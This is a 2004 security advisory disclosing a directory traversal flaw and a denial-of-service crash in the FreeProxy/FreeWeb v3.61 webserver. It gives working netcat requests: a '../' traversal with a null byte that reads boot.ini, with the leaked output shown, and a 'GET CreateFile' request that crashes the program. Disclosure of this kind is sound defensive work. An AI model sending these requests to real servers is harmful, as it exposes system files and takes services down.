The webserver in FreeProxy v3.6.1 contains directory traversal and denial of service vulnerabilities.
700a78e4033e8e8df008a7d4bab8eefa338548196ba4190ce23b5ac6517e2f52
SP Research Labs Advisory x08
-----------------------------
FreeProxy/FreeWeb v3.61 Multiple Vulnerabilities
------------------------------------------------
Vendor Home Page:
http://www.alphalink.com.au/~gregr/
Date Released - 1.8.2004
Downloads.com reported 105,607 downloads.
------------------------------------
Product Description from the vendor:
FreeProxy is professional Freeware which channels requests for internet pages via a single computer and enables many computers to share an internet connection. If you have dial-up internet access, you can use the Demand Dial or Auto-Dial feature to dial up the internet either when it detects you want to access the internet (demand) or maintain a strict schedule of connection times (auto). Works fast with Cable/Broadband.
--------------------
Directory Traversal:
A directory traversal vulnerability exists within the webserver part of this product, and not the proxy part of it.
Example:
--------
C:\>nc 192.168.1.100 80
GET /../../../../../../../boot.ini%00.html HTTP/1.0
HTTP/1.0 200 OK
Server: FreeProxy/3.61
Date: Fri, 09 Jan 2004 05:09:15 GMT
Content-Type: application/octet-stream
Last-Modified: Tue, 04 Nov 2003 16:55:36 GMT
Content-Length: 194
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional"
/fastdetect
------------------
Denial Of Service:
When making an HTTP request for a function called 'CreateFile', causes the entire application to crash.
Example:
--------
C:\>nc 192.168.1.100 80
GET CreateFile HTTP/1.0
**Application Crashes**
I get the following error message:
Unhandled exception in FreeProxy.exe: 0xC0000005: Access Violation.
-----------------------
Tested on WindowsXP SP1
Original Advisory:
http://www.security-protocols.com/modules.php?name=News&file=article&sid=1691&mode=&order=0&thold=0
Peace out,
------------------------------
badpack3t
www.security-protocols.com
------------------------------